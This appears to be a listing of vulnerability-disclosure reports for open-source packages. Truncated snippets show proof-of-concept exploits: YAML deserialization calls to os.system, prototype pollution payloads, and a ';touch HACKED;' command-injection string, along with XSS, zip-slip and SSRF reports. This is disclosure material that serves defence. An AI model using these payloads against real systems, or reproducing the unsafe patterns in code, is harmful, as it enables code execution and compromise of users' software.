4072 matches found
Code Injection in dimodimchev/access-control
Description Access-Control package is vulnerable to Arbitrary Code Execution due to insecure YAML deserialization. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept steps to reproduce: python import os os.system'git clone...
Path Traversal in mucommander/mucommander
:book: Description mucommander A lightweight, cross-platform file manager with a dual-pane interface. This package is vulnerable to zip-slip. https://github.com/mucommander/mucommander https://www.mucommander.com/ :recycle: Steps To Reproduce-: 0 download and run latest release from...
Cross-site Scripting (XSS) - Generic in prasathmani/tinyfilemanager
:book: Description TinyFileManager is web based file manager and it is a simple, fast and small file manager with a single file, multi-language ready web application for storing, uploading, editing and managing files and folders online via web browser. The Application runs on PHP 5.5+, It allows...
Code Injection in ngockhanh5110/nlp-vietnamese-text-summarization
Description nlp-vietnamese-text-summarization package is vulnerable to Arbitrary Code Execution due to insecure YAML deserialization. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept steps to reproduce: python import os...
Code Injection in xdf8/deepfriedbot
Description DeepFriedBot is a Telegram bot that sends random deep fried memes, package is vulnerable to Arbitrary Code Execution. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept python import os os.system'https://github.com/xdf8/DeepFriedBot'...
Server-Side Request Forgery (SSRF) in sebhildebrandt/systeminformation
Description systeminformation package is vulnerable to Server-side request forgery. It allows attackers to abuse @ to make requests to a different domain or possibility to applications that are not publicly exposed through http://[email protected]:8080. Proof of Concept javascript cons...
Code Injection in adobe/himl
Description himl is a hierarchical config using YAML in Python, which is vulnerable to Arbitrary Code Execution. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept Installation bash pip install himl Run exploit.py import os os.system'pip install himl...
Code Injection in adobe/ops-cli
Description ops-cli is a wrapper for Terraform, Ansible, Helmfile and SSH for cloud automation, which is vulnerable to Arbitrary Code Execution. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept Installation bash pip install ops-cli Run exploit.py...
Cross-site Scripting (XSS) - Generic in ciur/papermerge-js
Description Papermerge is an open source document management system (DMS) primarily designed for archiving and retrieving your digital documents. Instead of having piles of paper documents all over your desk, office or drawers - you can quickly scan them and configure your scanner to directly uploa...
Prototype Pollution in trenskow/keyd
Description keyd is vulnerable to Prototype Pollution. This package fails to restrict access to prototypes of objects, allowing for modification of prototype behavior using a proto payload, which may result in Sensitive Information Disclosure/Denial of Service (DoS)/Remote Code Execution. Proof of...
Code Injection in unix121/i3wm-themer
Description i3wm-themer is the theme collection manager for i3-wm which is vulnerable to Arbitrary Code Execution. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept Installation bash git clone https://github.com/unix121/i3wm-themer cd i3wm-themer/...
Code Injection in heartexlabs/label-studio
Description Label Studio is a swiss army knife of data labeling and annotation tools which is vulnerable to Arbitrary Code Execution. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept Installation bash pip3 install label-studio Run exploit.py impor...
Prototype Pollution in elcharitas/js-dot
Description Prototype Pollution in js-dot Proof of Concept 1. Create the following PoC file: // poc.js var jsDot = require"js-dot" var obj = console.log"Before : " + .polluted; jsDot.setobj,"proto.polluted","Yes! Its Polluted"; console.log"After : " + .polluted; 2. Execute the following commands ...
Prototype Pollution in allain/propper
Description Prototype Pollution in propper Proof of Concept 1. Create the following PoC file: // poc.js var propper = require"propper" var obj = console.log"Before : " + .polluted; propperobj,"proto.polluted","Yes! Its Polluted"; console.log"After : " + .polluted; 2. Execute the following command...
Command Injection in sebhildebrandt/systeminformation
Description systeminformation is vulnerable to Command Injection vulnerability. It is possible to send an array containing OS commands, which bypass the filters. Proof of Concept 1. Create a Javascript file with the content below: javascript const si = require'systeminformation'; const command =...
Cross-site Scripting (XSS) - Generic in ciur/papermerge-js
:star2: Description - Papermerge is an open source document management system (DMS) primarily designed for archiving and retrieving your digital documents. Instead of having piles of paper documents all over your desk, office or drawers. In The Admin Upload Function. Users Are Able To Trigger...
Denial of Service in sebhildebrandt/systeminformation
Description systeminformation is vulnerable to Denial of Service. It is possible to overwrite the ping command parameters, which results in too long execution. Proof of Concept Create a .js file with the content below and run it. javascript const si = require'systeminformation'; si.inetLatency"-c...
Prototype Pollution in borderlesslabs/assign
Description @borderlesslabs/assign is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var a = require"@borderlesslabs/assign" const payload = JSON.parse'"proto":"polluted":"Yes! Its Polluted"'; var obj = console.log"Before : " + .polluted;...
Prototype Pollution in sttk/fav-prop.set-deep
Description @fav/prop.set-deep is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js var setDeep = require"@fav/prop.set-deep" var obj = ; console.log"Before: " + .polluted; setDeepobj, "proto", "polluted", "Yes, its polluted"...
Path Traversal in rust-compress/rc-zip
:book: Description rc-zip Pure Rust zip & zip64 reading and writing. This package is vulnerable to zip-slip https://github.com/rust-compress/rc-zip https://crates.io/crates/rc-zip :recycle: Steps To Reproduce-: 0 download and run latest release from https://github.com/rust-compress/rc-zip 1 run ...
Cross-site Scripting (XSS) - Generic in ciur/papermerge
:book: Description Papermerge is an open source document management system (DMS) primarily designed for archiving and retrieving your digital documents. Instead of having piles of paper documents all over your desk, office or drawers - you can quickly scan them and configure your scanner to directl...
Cross-site Scripting (XSS) - Generic in rilyzhang/dy-server
Description Cross Site Scripting in dy-server2 Proof of Concept 1. Install package from npm: npm i -g dy-server2 2. Create folder or file with name: 3. Start server: dy-server2 -p 8888 4. Open website and the code will execute...
Command Injection in totaljs/framework
Description Command Injection in total.js Proof of Concept 1. Create the following PoC file: // poc.js const total = require'total.js'; let image = Image.load""; let payload = ";touch HACKED;"; image.pipenull,payload; 2. Execute the following commands in terminal: npm i total.js Install affected...
Prototype Pollution in kettek/dot-dotty
Description dot-dotty is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js const DotDotty = require'dot-dotty' let obj = a: 1 let dot = DotDottyobj console.log"Before : " + .polluted; dot'proto.polluted' = 'Yes! Its Polluted'; console.log"After : " +...
Code Injection in ewels/multiqc
Description MultiQC Aggregate results from bioinformatics analyses across many samples into a single report. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept Installation bash pip3 install multiqc Run exploit.py import os os.system'pip3 install...
Code Injection in nosarthur/gita
✍️ Description gita helps to Manage multiple git repos with sanity. Vulnerability description Vulnerable to YAML deserialization attack caused by unsafe loading. 🕵️♂️ Proof of Concept vulnerable part of code yaml.load in getcmdsfromfiles...
Code Injection in tensorspeech/tensorflowtts
✍️ Description TensorFlowTTS provides real-time state-of-the-art speech synthesis architectures such as Tacotron-2, Melgan, Multiband-Melgan, FastSpeech, FastSpeech2 based-on TensorFlow 2. With Tensorflow 2, we can speed-up training/inference progress, optimizer further by using fake-quantize awar...
Prototype Pollution in tandrewnichols/safe-obj
Description safe-obj is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js var safeObj = require"safe-obj" var obj = ; console.log"Before: " + .polluted safeObj.expandobj, "proto.polluted", true console.log"After: " + .polluted 2. Execute th...
Prototype Pollution in geta/nestedobjectassign
Description nested-object-assign is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const assign = require'nested-object-assign' console.log'Before: ' + .polluted assign, JSON.parse'"proto": "polluted": true' console.log'After: ' +...
Prototype Pollution in fabiospampinato/plain-object-merge
Description plain-object-merge is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const merge = require'plain-object-merge' console.log'Before: ' + .polluted merge, JSON.parse'"proto": "polluted": true' console.log'After: ' + .polluted 2...
Code Injection in tensorflow/tfx
Description TensorFlow Extended (TFX) is a Google-production-scale machine learning platform based on TensorFlow. It provides a configuration framework to express ML pipelines consisting of TFX components. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of...
Server-Side Request Forgery (SSRF) in sterlp/svg2png
:book: Description Svg2Png Manage your Icons in SVG and generate the needed PNG into your projects as needed. No "Web Service" needed, just an executable JAR file. this package is vulnerable to XXE. https://github.com/sterlp/svg2png :recycle: Steps To Reproduce-: 0 download and run latest release...
Prototype Pollution in fedeghe/objwun
Description objwun is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const set = require'objwun' console.log'Before: ' + .polluted set, 'proto.polluted', true console.log'After: ' + .polluted 2. Execute the following commands in the...
Prototype Pollution in grpc/grpc-node
Description grpc native core package is vulnerable to Prototype Pollution. This package allows for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var grpc =require'grpc'...
Prototype Pollution in a-maged/object-breacher
Description object-breacher is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const set = require'object-breacher' console.log'Before: ' + .polluted set, 'proto.polluted', true console.log'After: '+ .polluted 2. Execute the following...
Prototype Pollution in thi-ng/umbrella
Description @thi.ng/paths is vulnerable to Prototype Pollution. The vulnerability is due to an incomplete fix. mutIn function does not have fix implemented. Proof of Concept 1. Create the following PoC file: javascript // poc.js const paths = require'@thi.ng/paths' console.log"Before: ", .pollute...
Prototype Pollution in alexandervu/dot-prop-opt
Description dot-prop-opt is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const set = require'dot-prop-opt' console.log'Before: ' + .polluted set, 'proto.polluted', true console.log'After: ' + .polluted 2. Execute the following commands...
Prototype Pollution in yomguithereal/baobab
Description baobab is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const Baobab = require'baobab'; console.log'Before: ' + .polluted tree = new Baobab tree.deepMergeJSON.parse'"proto": "polluted": true' console.log'After: ' + .polluted...
Prototype Pollution in cronvel/tree-kit
Description tree-kit is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const dotPath = require'tree-kit' console.log"Before: ", .polluted dotPath.set, 'proto.polluted', true console.log"After: ", .polluted 2. Execute the following comman...
Cross-site Scripting (XSS) - Generic in frappe/charts
Description frappe-charts is vulnerable to Cross-Site Scripting (XSS) due to an incomplete fix https://github.com/frappe/charts/commit/d5706a501b44fce6949216b635ed6c5e785c471d. Steps To Reproduce 1. Open the following codesandbox...
Code Injection in tensorlayer/tensorlayer
Description TensorLayer is a novel TensorFlow-based deep learning and reinforcement learning library designed for researchers and engineers. It provides an extensive collection of customizable neural layers to build advanced AI models quickly. This package is vulnerable to Arbitrary Code Executio...
Prototype Pollution in js-data/js-data
Description js-data is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js const js = require"js-data"; const payload = JSON.parse'"proto":"polluted":"Yes! Its Polluted"'; var obj = console.log"Before : " + .polluted; js.utils.deepMixInobj, payload;...
Prototype Pollution in indlekofer/object_set
Description Prototype Pollution in @indlekofer/objectset Proof of Concept 1. Create the following PoC file: // poc.js var objectSet = require"@indlekofer/objectset" var obj = console.log"Before : " + .polluted; objectSet.defaultobj,"proto","polluted","Yes! Its Polluted"; console.log"After : " +...
Prototype Pollution in danieldelcore/object-deep-key
Description object-deep-key is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const objDeepKey = require'object-deep-key'.default console.log'Before: ', .toString objDeepKeyconstructor.prototype, 'toString'.set'function prototype pollute...
Prototype Pollution in dominictarr/libnested
Description libnested is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var libnested = require"libnested" var obj = console.log"Before : " + .polluted; libnested.setobj, 'proto','polluted', 'Yes! Its Polluted'; console.log"After : " + .polluted; 2...
Prototype Pollution in xiaoyifan6/json-glat
Description json-glat is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var jsonGlat = require"json-glat" console.log"Before : " + .polluted; jsonGlat.parse'proto.polluted': 'Yes! Its Polluted'; console.log"After : " + .polluted; 2. Execute the...
Prototype Pollution in lukeed/dset
Description dset is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var dset = require"dset" var obj = console.log"Before : " + .polluted; dsetobj, 'proto.polluted', 'Yes! Its Polluted'; console.log"After : " + .polluted; 2. Execute the following...
Prototype Pollution in babak-gholamzadeh/deeply-object-assign
Description deeply-object-assign is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var deeplyObjectAssign = require"deeply-object-assign" const payload = JSON.parse'"proto":"polluted":"Yes! Its Polluted"'; var obj = console.log"Before : " +...
Prototype Pollution in quernest/arr-flatten-unflatten
Description arr-flatten-unflatten is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var arrFlattenUnflatten = require"arr-flatten-unflatten" console.log"Before : " + .polluted; arrFlattenUnflatten.unflatten'protopolluted': 'Yes! Its Polluted';...
Prototype Pollution in allgay/jsonuri
Description jsonuri is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js const set = require'jsonuri' var obj = console.log"Before : " + .polluted; set, 'proto/polluted', 'Yes! Its Polluted'; console.log"After : " + .polluted; 2. Execute the following...